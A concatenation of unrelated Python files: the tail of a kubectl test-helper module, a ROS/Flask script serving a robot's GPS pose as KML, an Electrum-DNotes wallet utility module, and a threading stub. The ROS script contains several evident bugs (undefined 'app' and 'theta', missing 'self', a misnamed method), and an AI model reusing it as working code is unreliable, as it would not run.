delete(ns, "ic", name, timeout=timeout)
def delete_mbk(ns, name, timeout=200):
delete(ns, "mbk", name, timeout=timeout)
def delete_po(ns, name, timeout=120):
delete(ns, "po", name, timeout=timeout)
def delete_sts(ns, name, timeout=5):
delete(ns, "sts", name, timeout=timeout)
def delete_rs(ns, name, timeout=5):
delete(ns, "rs", name, timeout=timeout)
def delete_deploy(ns, name, timeout=5):
delete(ns, "deploy", name, timeout=timeout)
def delete_svc(ns, name, timeout=5):
delete(ns, "svc", name, timeout=timeout)
def delete_pvc(ns, name, timeout=60):
delete(ns, "pvc", name, timeout=timeout)
def delete_pv(name, timeout=60):
delete(None, "pv", name, timeout=timeout)
def delete_ns(ns, timeout=90):
delete(None, "ns", ns, timeout=timeout)
def delete_cm(ns, name, timeout=5):
delete(ns, "cm", name, timeout=timeout)
def delete_secret(ns, name, timeout=5):
delete(ns, "secret", name, timeout=timeout)
#
def logs(ns, name, prev=False):
if type(name) is str:
args = [name]
else:
args = [name[0], "-c", name[1]]
if prev:
args.append("-p")
return kubectl("logs", None, args + ["-n", ns]).stdout.decode("utf8")
def cat(ns, name, path):
if type(name) is str:
args = [name]
else:
args = [name[0], "-c", name[1]]
args += ["-n", ns, "--", "cat", path]
p = kubectl_popen("exec", args)
s = p.stdout.read()
p.terminate()
return s
def exec(ns, name, cmd):
if type(name) is str:
args = [name]
else:
args = [name[0], "-c", name[1]]
kubectl("exec", None, args + ["-n", ns, "--"] + cmd)
def kill(ns, name, sig, pid):
try:
if type(name) is str:
args = [name]
else:
args = [name[0], "-c", name[1]]
kubectl("exec", None, args +
["-n", ns, "--", "/bin/sh", "-c", f"kill -{sig} {pid}"])
except subprocess.CalledProcessError as e:
if e.returncode == 137:
pass
else:
raise
#
def apply(ns, yaml, *, check=True):
try:
return feed_kubectl(strip_blanks(yaml), "apply", args=[
"-n", ns, "-f", "-"], check=check)
except subprocess.CalledProcessError as e:
print(e.stdout.decode("utf8"))
raise
def patch(ns, rsrc, name, changes, type=None):
kubectl("patch", rsrc, [name, "-p", yaml.dump(changes),
"-n", ns] + (["--type=%s" % type] if type else []))
def patch_pod(ns, name, changes, type=None):
patch(ns, "pod", name, changes, type)
def patch_ic(ns, name, changes, type=None):
patch(ns, "ic", name, changes, type)
#
def ls_nodes():
return split_table(kubectl("get", "nodes").stdout.decode("utf8"))
def node_pods():
return split_table(kubectl("get", "nodes").stdout.decode("utf8"))
def drain_node(node):
pass
#
def wait_pod_exists(ns, name, timeout=120, checkabort=lambda: None):
logger.info(f"Waiting for pod {ns}/{name} to come up")
for i in range(timeout):
pods = ls_po(ns)
for pod in pods:
if pod["NAME"] == name:
logger.info(f"{ns}/{name} is {pod['STATUS']}")
return pod
time.sleep(1)
logger.info("%s", kubectl("get", "pod", args=[
"-n", ns]).stdout.decode("utf8"))
raise Exception(f"Timeout waiting for pod {ns}/{name}")
def wait_pod_gone(ns, name, timeout=120, checkabort=lambda: None):
logger.info(f"Waiting for pod {ns}/{name} to disappear")
i = 0
last_state = None
while i < timeout:
pods = ls_po(ns)
for pod in pods:
if pod["NAME"] == name:
if last_state != pod["STATUS"]:
if last_state and pod["STATUS"] == "Terminating":
# state just switched to Terminating, extend the timeout
i = 0
last_state = pod["STATUS"]
break
else:
logger.info(f"{ns}/{name} is gone")
return True
time.sleep(1)
i += 1
logger.info("%s", kubectl("get", "pod", args=[
"-n", ns]).stdout.decode("utf8"))
raise Exception(f"Timeout waiting for pod {ns}/{name}")
def wait_pod(ns, name, status="Running", timeout=120, checkabort=lambda: None):
if type(status) not in (tuple, list):
status = [status]
def check_status(line):
checkabort()
logger.debug("%s", line)
if line["STATUS"] in ("Error", "ImagePullBackOff", "ErrImageNeverPull", "CrashLoopBackOff") and line["STATUS"] not in status:
raise Exception(f"Pod error: {line['STATUS']}")
print(line)
return line["STATUS"] in status
wait_pod_exists(ns, name, timeout, checkabort)
logger.info(f"Waiting for pod {ns}/{name} to become {status}")
checkabort()
r = watch(ns, "pod", name, check_status, timeout,
format="custom-columns=NAME:.metadata.name,STATUS:.status.phase")
logger.info(f"{r}")
return r
def wait_ic_exists(ns, name, timeout=60, checkabort=lambda: None):
logger.info(f"Waiting for ic {ns}/{name} to come up")
for i in range(timeout):
checkabort()
ics = ls_ic(ns)
for ic in ics:
if ic["NAME"] == name:
logger.info(f"{ns}/{name} is {ic['STATUS']}")
return ic
time.sleep(1)
logger.info("%s", kubectl("get", "ic", args=[
"-n", ns]).stdout.decode("utf8"))
raise Exception(f"Timeout waiting for ic {ns}/{name}")
def wait_ic_gone(ns, name, timeout=120, checkabort=lambda: None):
logger.info(f"Waiting for ic {ns}/{name} to disappear")
last_state = None
i = 0
while i < timeout:
checkabort()
ics = ls_ic(ns)
for ic in ics:
if ic["NAME"] == name:
if last_state != ic["STATUS"]:
if last_state and ic["STATUS"] == "FINALIZING":
# state just switched to FINALIZING, extend the timeout
i = 0
last_state = ic["STATUS"]
break
else:
logger.info(f"{ns}/{name} is gone")
return True
time.sleep(1)
i += 1
logger.info("%s", kubectl("get", "ic", args=[
"-n", ns]).stdout.decode("utf8"))
raise Exception(f"Timeout waiting for ic {ns}/{name}")
def wait_ic(ns, name, status=["ONLINE"], num_online=None, timeout=200, checkabort=lambda: None):
if type(status) not in (tuple, list):
status = [status]
def check_status(line):
checkabort()
logger.debug("%s", line)
return line["STATUS"] in status and (num_online is None or line["ONLINE"] >= str(num_online))
wait_ic_exists(ns, name, timeout, checkabort)
logger.info(
f"Waiting for ic {ns}/{name} to become {status}, num_online={num_online}")
checkabort()
r = watch(ns, "ic", name, check_status, timeout,
format="custom-columns=NAME:.metadata.name,STATUS:.status.cluster.status,ONLINE:.status.cluster.onlineInstances")
logger.info(f"{r}")
return r
#
def portfw(ns, name, in_port):
p = kubectl_popen("port-forward", ["pod/%s" % name, ":%s" %
in_port, "--address", "127.0.0.1", "-n", ns])
line = p.stdout.readline().decode("utf8")
return p, int(line.split("->")[0].split(":")[-1].strip())
#
def create_ns(ns):
kubectl("create", "namespace", [ns], ignore=["AlreadyExists"])
def create_testpv(ns, name):
yaml = f"""
apiVersion: v1
kind: PersistentVolume
metadata:
name: {name}
labels:
type: local
spec:
storageClassName: manual
capacity:
storage: 20Gi
accessModes:
- ReadWriteOnce
hostPath:
path: "/tmp/data"
"""
apply(ns, yaml)
def create_secrets(ns, name, data):
nl = "\n"
indent = "\n "
yaml = f"""
apiVersion: v1
kind: Secret
metadata:
name: {name}
data:
{indent.join(data.strip().split(nl))}
"""
apply(ns, yaml)
def create_apikey_secret(ns, name, path, config_name = "config", profile_name = "DEFAULT", privatekey = "key.pem"):
import configparser
ini_parser = configparser.ConfigParser()
ini_parser.read(f"{path}/{config_name}")
if not profile_name in ini_parser:
raise Exception(f"{profile_name} profile not found")
# kubectl doesn't like relative paths
path = pathlib.Path(path).expanduser().absolute()
if not os.path.isfile(f"{path}/{privatekey}"):
raise Exception(f"{path}/{privatekey} doesn't exist")
KEY_FILE_INI_OPTION_NAME = "key_file"
options = [ "generic", name, "-n", ns]
options.append(f"--from-file=privatekey={path}/{privatekey}")
for ini_key, ini_value in ini_parser[profile_name].items():
if ini_key != KEY_FILE_INI_OPTION_NAME:
options.append(f"--from-literal={ini_key}={ini_value}")
kubectl("create", "secret", options)
def create_user_secrets(ns, name, root_user=None, root_host=None, root_pass=None, extra_keys=[]):
data = []
if root_user is not None:
data.append(f"rootUser: {b64encode(root_user)}")
if root_host is not None:
data.append(f"rootHost: {b64encode(root_host)}")
if root_pass is not None:
data.append(f"rootPassword: {b64encode(root_pass)}")
data += extra_keys
create_secrets(ns, name, "\n".join(data))
def create_pod():
pass
if __name__ == "__main__":
testdata = """NAMESPACE NAME READY STATUS RESTARTS AGE
default testpod 1/1 Running 0 38m
docker compose-78f95d4f8c-pj4pl 1/1 Running 0 7h32m
docker compose-api-6ffb89dc58-2fpc2 1/1 Running 0 7h32m
kube-system coredns-5644d7b6d9-qbjrv 1/1 NotRunning 0 7h33m
kube-system coredns-5644d7b6d9-vf6ft 1/1 Running 0 7h33m
kube-system etcd-docker-desktop 1/1 Running 0 7h32m
kube-system kube-apiserver-docker-desktop 1/1 0 7h32m
kube-system kube-controller-manager-docker-desktop 1/1 Running 0 7h32m
kube-system kube-proxy-cxcgf 1/1 Running 0 7h33m
kube-system kube-scheduler-docker-desktop 1/1 Running 0 7h32m
kube-system storage-provisioner 1/1 Running 0 7h32m
kube-system vpnkit-controller 1/1 Running 0 7h32m
mysql-operator mysql-operator-5bfb6dfdb7-mj5tx 1/1 Running 0 6h20m
"""
lines = testdata.strip().split("\n")
splitter = TableSplitter(lines[0])
for l in lines[1:]:
p = splitter.split(l)
print(p)
assert len(p) == len(splitter.columns)
|
frontend_server_ros_demo.py
|
#!/usr/bin/env python
import flask
import math
import rospy
from piksi_rtk_msgs import msg
import time
import threading
POSE_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2"
xmlns:gx="http://www.google.com/kml/ext/2.2">
<Document>
<Style id="gecko_icon">
<IconStyle>
<scale>5</scale>
<heading>{heading}</heading>
<Icon>
<href>file://home/gecko/shared/gecko_icon.png</href>
</Icon>
</IconStyle>
</Style>
<Placemark id="tg_robot">
<name>TechnoGecko Robot</name>
<styleUrl>#gecko_icon</styleUrl>
<Point>
<coordinates>{lng},{lat},0</coordinates>
</Point>
</Placemark>
</Document>
</kml>"""
HEADING_OFFSET_DEG = 100
class GuardedPose(object):
def __init__(self):
self._pose_lock = threading.Lock()
self._lat = 0
self._lng = 0
self._heading = 0
def set_latlng(lat, lng):
with self._pose_lock:
self._lat, self._lng = lat, lng
def set_heading(self, heading):
with self._pose_lock:
self._heading = heading
def get():
with self._pose_lock:
return self._lat, self._lng, self._heading
guarded_pose = GuardedPose()
def gps_reader():
rospy.init_node('gps_subscriber')
position_sub = rospy.Subscriber('/gps_position/baseline_ned', msg.BaselineNed,
position_callback)
heading_sub = rospy.Subscriber('/gps_position/baseline_heading', msg.BaselineHeading,
heading_callback)
# rospy.spin()
@app.route('/tg.kml')
def position():
global guarded_pose
lat, lng = guarded_pose.get()
return POSE_TEMPLATE.format(lat=lat, lng=lng,
heading=HEADING_OFFSET_DEG + math.degrees(theta))
def position_callback(m):
global guarded_pose
print "Position callback invoked."
guarded_pose.set_latlng(m.lat, m.lng)
def heading_callback(m):
global guarded_pose
print "Heading callback invoked."
guarded_pose.set_headinglng(m.heading)
def main():
print('Starting GPS subscriber...')
threading.Thread(target=gps_reader).start()
print('Starting frontend server...')
app = flask.Flask(__name__)
app.run(host='localhost', port=9090)
if __name__ == '__main__':
main()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'NOTE':8, 'mNOTE':5, 'uNOTE':2}
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " NOTE"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum_dnotes.electrum-dnotes'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dnotes_dir = ext_dir + '/electrum-dnotes'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dnotes_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dnotes_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dnotes_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-dnotes")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum DNotes")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum DNotes")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=1)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain/',
{'tx': 'transactions/', 'addr': 'addresses/'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp/',
{'tx': 'Transaction/', 'addr': 'Address/'}),
'Blockchain.info': ('https://blockchain.info/',
{'tx': 'tx/', 'addr': 'address/'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion/',
{'tx': 'tx/', 'addr': 'address/'}),
'Blockr.io': ('https://btc.blockr.io/',
{'tx': 'tx/info/', 'addr': 'address/info/'}),
'Blocktrail.com': ('https://www.blocktrail.com/NOTE/',
{'tx': 'tx/', 'addr': 'address/'}),
'BTC.com': ('https://chain.btc.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'Chain.so': ('https://www.chain.so/',
{'tx': 'tx/NOTE/', 'addr': 'address/NOTE/'}),
'Insight.is': ('https://insight.bitpay.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain/',
{'tx': 'tx/', 'addr': 'address/'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc/',
{'tx': 'tx/', 'addr': 'address/'}),
'Blockchair.com': ('https://blockchair.com/bitcoin/',
{'tx': 'transaction/', 'addr': 'address/'}),
'blockonomics.co': ('https://www.blockonomics.co/',
{'tx': 'api/tx?txid=', 'addr': '#/search?q='}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'dnotes':
raise Exception("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid DNotes address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='dnotes', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
|
mutiThreadReqHttp.py
|
import threading, time
def run(num):
print("子线程%s开始..." % (threading.current_thread().name))
time.sleep(2)
print(num)
time.sleep(2)
